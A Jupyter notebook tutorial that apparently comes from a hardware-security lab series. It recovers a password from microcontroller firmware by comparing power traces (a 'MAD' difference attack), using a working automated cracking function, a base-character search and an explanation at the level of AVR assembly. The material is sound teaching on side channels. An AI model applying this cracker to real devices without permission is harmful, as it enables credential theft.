# Attack Password with ~~Timing Analysis~~ Difference Analysis III (MAD)

In [None]:
%run '../util/Metadata.ipynb'
print_metadata()

<h1>Table of Contents<span class="tocSkip"></span></h1>
<div class="toc"><ul class="toc-item"><li><span><a href="#Improving-the-code" data-toc-modified-id="Improving-the-code-1"><span class="toc-item-num">1&nbsp;&nbsp;</span>Improving the code</a></span></li><li><span><a href="#Basic-Setup" data-toc-modified-id="Basic-Setup-2"><span class="toc-item-num">2&nbsp;&nbsp;</span>Basic Setup</a></span></li><li><span><a href="#Helper-Functions-for-Password-Attack" data-toc-modified-id="Helper-Functions-for-Password-Attack-3"><span class="toc-item-num">3&nbsp;&nbsp;</span>Helper Functions for Password Attack</a></span></li><li><span><a href="#Try-the-old-Timing-Attack" data-toc-modified-id="Try-the-old-Timing-Attack-4"><span class="toc-item-num">4&nbsp;&nbsp;</span>Try the old Timing Attack</a></span></li><li><span><a href="#MAD-password-attack" data-toc-modified-id="MAD-password-attack-5"><span class="toc-item-num">5&nbsp;&nbsp;</span>MAD password attack</a></span></li><li><span><a href="#Find-good-base-characters" data-toc-modified-id="Find-good-base-characters-6"><span class="toc-item-num">6&nbsp;&nbsp;</span>Find good base characters</a></span></li><li><span><a href="#Analyze-all-possible-base-characters" data-toc-modified-id="Analyze-all-possible-base-characters-7"><span class="toc-item-num">7&nbsp;&nbsp;</span>Analyze <em>all</em> possible base characters</a></span></li><li><span><a href="#Why-different-base-characters-give-different-MADs" data-toc-modified-id="Why-different-base-characters-give-different-MADs-8"><span class="toc-item-num">8&nbsp;&nbsp;</span>Why different base characters give different MADs</a></span></li><li><span><a href="#Disconnect" data-toc-modified-id="Disconnect-9"><span class="toc-item-num">9&nbsp;&nbsp;</span>Disconnect</a></span></li></ul></div>

In this example we want to improve the `basic-passwdcheck` to be resistant against the attack from the last tutorial.

## Improving the code

Let's first recap the password checking loop from `basic-passwdcheck`:
```c
for(uint8_t i = 0; i < sizeof(correct_passwd); i++){
    if (correct_passwd[i] != passwd[i]){
        passbad = 1;
        break;
    }
}
```

The timing attack discussed in the last example worked because the loop's runtime varies with the number of correct characters. Once the first wrong character occurs the loop breaks.
This is, what we want to change:

```c
for(uint8_t i = 0; i < sizeof(correct_passwd); i++){
    if (correct_passwd[i] != passwd[i]){
        passbad = 1;
    }
}
```

This is an excerpt from `advanced-passwdcheck.c`. It is clear that the loop does not break after the first wrong character and always all characters of the password are checked. In [Try the old Timing Attack](#Try-the-old-Timing-Attack) we can see that the old timing attack does not work anymore.

## Basic Setup

Define Variables

In [None]:
%run "../util/Init.ipynb"

Build target and upload

In [None]:
TARGET = 'advanced-passwdcheck'
%store TARGET
%run "$HELPERSCRIPTS/Prepare.ipynb"

Import helper functions

In [None]:
%run "$HELPERSCRIPTS/Setup_Generic.ipynb"

In [None]:
scope.adc.samples = 500

## Helper Functions for Password Attack

In [None]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool, Label

output_notebook()

In [None]:
def cap_pass_trace(pass_guess):
    reset_target(scope)
    scope.arm()
    target.flush()
    target.write(pass_guess)
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    
    ret = ''
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()
    
    return trace, ret

In [None]:
def sad(trace1, trace2):
    return sum(abs(trace1 - trace2))

## Try the old Timing Attack

Let's try again to see a difference in terms of SAD between a correct and a wrong character.

In [None]:
outputbuf = ""
trace1, _ = cap_pass_trace('a\n')
trace2, _ = cap_pass_trace('b\n')
trace3, _ = cap_pass_trace('i\n')
p = figure(height=200)
p.add_tools(CrosshairTool())
p.line(range(len(trace1)), abs(trace1 - trace2), color='blue',
       legend='abs(trace1 - trace2) with SAD = {:.2f}'.format(sad(trace1, trace2)))
p.line(range(len(trace1)), abs(trace1 - trace3), color='red', 
       legend='abs(trace1 - trace3) with SAD = {:.2f}'.format(sad(trace1, trace3)))
show(p)

If you run this maybe more than one time you will see that the SAD is around 8-10 and the difference between the SADs is far too low to distinguish right from wrong characters.

Did we found a "secure" solution where an attacker cannot reveal the password?
The answer is simple: No. It's just a bit harder. We just have to tweak the attack a bit. You might recognize a high peek at around position 70 in the plot above. This peek is much higher in the red plot than in the blue one.

We can use this peek to still get the attack working.

In [None]:
import numpy
def cap_pass_trace_multiple(guess, repetitions):
    traces = 0
    output = ''
    for _ in range(repetitions):
        t, o = cap_pass_trace(guess)
        traces += t
        output += o
    return traces, output

In the style of SAD (sum of absolute differences) we call this MAD: Maximum of absolute differences.

In [None]:
def mad(trace1, trace2):
    return max(abs(trace1 - trace2))

If we record more than one trace per attempt we can sum all recorded traces for the same attempt and find out that the peek and especially the difference between the peek hights becomes significant:

In [None]:
outputbuf = ""
trace1, out1 = cap_pass_trace_multiple('\xf8\n', 2)
trace2, out2 = cap_pass_trace_multiple('a\n', 2)
trace3, out3 = cap_pass_trace_multiple('i\n', 2)

p = figure()
p.add_tools(CrosshairTool())
p.line(range(len(trace1)), abs(trace1 - trace2), color='blue',
       legend='abs(trace1 - trace2) with MAD = {:.2f}'.format(mad(trace1, trace2)))
p.line(range(len(trace1)), abs(trace1 - trace3), color='red', 
       legend='abs(trace1 - trace3) with MAD = {:.2f}'.format(mad(trace1, trace3)))
show(p)

Now we can program an automated version of the password cracker again:

## MAD password attack

1. Start capturing the base character. Let's call this `base_trace`.
2. Capture further characters and calculate the MAD between this and `base_trace`.
3. Start from beginning incorporating the found right character.

This is very similar to the SAD attack. Except we use a different criterion of distinction and everytime we say 'capture a trace' we mean 'capture a few traces and sum them up'.

In [None]:
def mad_attack(
    check_level=0.1,
    base_char='\xf8',
    trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'
):
    password = ''
    outputbuf = ''

    while 'Welcome' not in outputbuf:
        # Capture base_trace with definitly wrong next character
        base_trace, _ = cap_pass_trace_multiple(password + base_char + '\n', 2)

        for c in trylist:
            # Try character
            trace, outputbuf = cap_pass_trace_multiple(password + c + '\n', 2)
            # Check if c is correct
            if mad(base_trace, trace) > check_level:
                print("Success: " + c)
                password += c
                break

    print('Successfully broken password: ' + password)

mad_attack()

---
We did not tell why `\xf8` is a good base character! To give an answer to this question we have to do a detailed analysis:

## Find good base characters

First we define a function to print out and analyze the *quality* of a single base character.

In [None]:
import tqdm
import pandas

def test_base_char(base_char):
    trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'
    stats = []
    base_trace, _ = cap_pass_trace_multiple(base_char + '\n', 2)
    for c in tqdm.tqdm_notebook(trylist):
        stats.append((
            '{:02x}'.format(ord(base_char)) if base_char else '', 
            c, 
            mad(base_trace, cap_pass_trace_multiple(c + '\n', 2)[0])
        ))
    df = pandas.DataFrame(stats, columns=['base_char', 'char', 'mad'])
    df = df.sort_values(by='mad', ascending=False)
    return df

stats = test_base_char('\xf8')
stats

This can be also put nicely in a plot:

In [None]:
import bokeh.palettes
import bokeh.transform
import bokeh.models

df = stats.copy().sort_values('char')

colormap = bokeh.transform.linear_cmap(
    field_name='mad', 
    palette=bokeh.palettes.Oranges6, 
    low=max(df['mad']),
    high=min(df['mad'])
)

p = figure(x_range=df['char'])
p.add_tools(CrosshairTool())
p.vbar(x='char', top='mad', source=df, width=0.5, color=colormap)
show(p)

## Analyze *all* possible base characters

In [None]:
import tqdm
import pandas as pd

def analyse_all_base_chars(
    base_list=list(map(chr, range(1, 256))), 
    trylist='abcdefghijklmnopqrstuvwxyz0123456789',
    filename='mad_chars_stats.dat',
    password='ifx2019',
):
    stats = []
    for pass_len in tqdm.tqdm_notebook(range(len(password))):
        for base_char in tqdm.tqdm_notebook(base_list):
            base_trace, _ = cap_pass_trace_multiple(password[:pass_len] + base_char + '\n', 2)
            for c in tqdm.tqdm_notebook(trylist):
                stats.append((
                    password[pass_len], 
                    '{:02x}'.format(ord(base_char)), 
                    c, 
                    mad(base_trace, cap_pass_trace_multiple(password[:pass_len] + c + '\n', 2)[0])
                ))

    stats = pd.DataFrame(stats, columns=['pass_char', 'base_char', 'char', 'mad'])
    stats.to_pickle(filename)

# Commented because it takes around 4h
# analyse_all_base_chars()

In [None]:
import pandas as pd
mad_chars_stats = pd.read_pickle('mad_chars_stats.dat')
mad_chars_stats

In [None]:
import bokeh
from bokeh.models import LinearColorMapper

df = mad_chars_stats.copy()
df['disp'] = df['pass_char'] + '-' + df['char']

colormap = LinearColorMapper(
    palette=bokeh.palettes.PuRd5,
    low=min(df.query('char == pass_char').groupby('pass_char').max()['mad']),
    high=min(df['mad']),
)

p = figure(
    x_range=df['base_char'].unique(),
    y_range=df['disp'].unique(),
    plot_height=600,
    sizing_mode='stretch_both',
)

p.rect(x='base_char', y='disp', source=df, width=1, height=1, 
       fill_color={'field': 'mad', 'transform': colormap},
       line_color=None)

# Reset ouput to display the graph purely in a new tab
# bokeh.io.reset_output()

show(p)
bokeh.io.output_notebook()

What can we see in the above heatmap:
* Dark rects represent a high MAD value.
* Light rects represent a low MAD value.
* We can see all the correct characters.
* "Good" columns are those which do not have many dark rects.
* The "best" base character is the column where the highest MAD is the most difference from the MAD values that give the correct characters.

The "best" base character can be also found programmatically:

In [None]:
import numpy
import pandas

df = mad_chars_stats
stats = []
for base_char in df['base_char'].unique():
    df_base_char = df[df['base_char'] == base_char]
    min_pass_char_mad = min(df_base_char.query('pass_char == char')['mad'])
    max_guess_char_mad = max(df_base_char.query('pass_char != char')['mad'])
    stats.append((base_char, min_pass_char_mad, max_guess_char_mad, min_pass_char_mad - max_guess_char_mad))

df = pandas.DataFrame(stats, columns=['base_char', 'min_pass_char_mad', 'max_guess_char_mad', 'diffdiff'])
df = df.sort_values(by=['diffdiff'], ascending=False)
df

And indeed, we found that `\xf8` is the best base character to crack the password!

## Why different base characters give different MADs

We found out that not all base characters give equal results. But, what we did not discuss yet is why there is such a difference in the MAD for different base characters.

Therefore let's start by comparing two different base characters:

In [None]:
outputbuf = ""
trace1, _ = cap_pass_trace_multiple('\x00\n', 2)
trace2, _ = cap_pass_trace_multiple('\xff\n', 2)
trace3, _ = cap_pass_trace_multiple('i\n', 2)
trace4, _ = cap_pass_trace_multiple('a\n', 2)

data = [
    (abs(trace1 - trace3), '\\x00 <-> i'),
    (abs(trace1 - trace2), '\\x00 <-> \\xff'),
    (abs(trace2 - trace3), '\\xff <-> i'),
    (abs(trace4 - trace3), 'a <-> i'),
]
colors = bokeh.palettes.Set1_8

p = figure(x_range=(0, 100), height=400, sizing_mode='stretch_width')
p.add_tools(CrosshairTool())
for (trace, legend), color in zip(data, colors):
    p.line(range(len(trace)), trace, color=color, legend=legend)
show(p)

As `scope.clock` is set (by default) to `clkgen_x4` we are recording 4 samples per targets cpu cycle. Looking at aboves figure we can also see this by measuring the distance between two peeks. This means we have three instructions which generate heavy difference. Why?
If we want to understand this we have to take a look at the assembly of the respective password comparison loop:

```
    ldi  r24, 0x00   ; passbad = 0
loop:
    ld   r20, X+     ; correct_chr = *correct_passwd; correct_passwd++;
    ld   r25, Z+     ; chr = *passwd; passwd++;
    cpse r20, r25    ; if (correct_chr == chr) skip next instruction;
    ldi  r24, 0x01   ; passbad = 1;
```

__`ld r20, X+`__ <br/>
Loading the correct character is the same for every attempt. So, this does not generate much difference.

__`ld r25, Z+`__ <br/>
Loading the attempt character can generate difference. As we already know, the power consumption of a microcontroller is direct proportional to the hamming weight of the data it processes. Thus, if the character `\xff` (Hamming weight 8) is loaded during this instruction the power consumption is much different to the one loading `\x00` (Hamming weight 0).
On the other hand this difference is less comparing the characters `\x00` and `i` (Hamming weight 4).
This is exactly what we can see in the different heights of the blue, green and red line at x = 53.

__`cpse r20, r25`__ <br/>
The comparison itself is a bit harder to analyze. It depends on the one hand by the Hamming weight of the two operands, on the other hand by the previous operations and the result of the comparison. Thus we can examine that the comparison between `\xff` and `i` is very different to the comparison between `i` and `i`. (The green line). The least difference in the above plot is generated by the red line which represents the comparison of `\x00` with `i` and `i` with `i`.

__`ldi r24, 0x01`__ <br/>
This instruction is only executed in `trace3` and all the peaks in lines which include `trace3` show a nearly equal hight. The only one which does not incorporate `trace3` is the blue line where we do not see any peak at this instruction because it is skipped for both traces.

Finally we can put the information about the peak and instruction connection into the plot:

In [None]:
import numpy
from bokeh.models import Span, Label, BoxAnnotation
import bokeh.palettes

# Record traces
trace1, _ = cap_pass_trace_multiple('\x00\n', 2)
trace2, _ = cap_pass_trace_multiple('\xff\n', 2)
trace3, _ = cap_pass_trace_multiple('i\n', 2)
trace4, _ = cap_pass_trace_multiple('a\n', 2)

data = [
    (abs(trace1 - trace3), '\\x00 <-> i'),
    (abs(trace1 - trace2), '\\x00 <-> \\xff'),
    (abs(trace2 - trace3), '\\xff <-> i'),
    (abs(trace4 - trace3), 'a <-> i'),
]
colors = bokeh.palettes.Set1_8

p = figure(height=400, x_range=(45, 65), sizing_mode='stretch_width')
p.add_tools(CrosshairTool())

# Plot annotations
indexmaxblue = numpy.argmax(abs(trace1 - trace2))
annotations = [indexmaxblue + 4 * i for i in range(-1, 3)]

for x, text in zip(annotations, ['ld r20, X+', 'ld r25, Z+', 'cpse r20, r25', 'ldi 24, 0x01']):
    p.add_layout(Span(location=x, dimension='height', line_color='darkslateblue', line_width=20, line_alpha=0.1))
    p.add_layout(Label(x=x, y=p.plot_height, text=text, y_units='screen', x_offset=-15, y_offset=-50,
                       text_align='right', text_color='darkslateblue'))
    for (trace, _), color in zip(data, colors):
        p.circle(x, trace[x], size=10, color=color)

# Plot differences
for (trace, legend), color in zip(data, colors):
    p.line(range(len(trace)), trace, color=color, legend=legend)

show(p)

## Disconnect

In [None]:
scope.dis()
target.dis()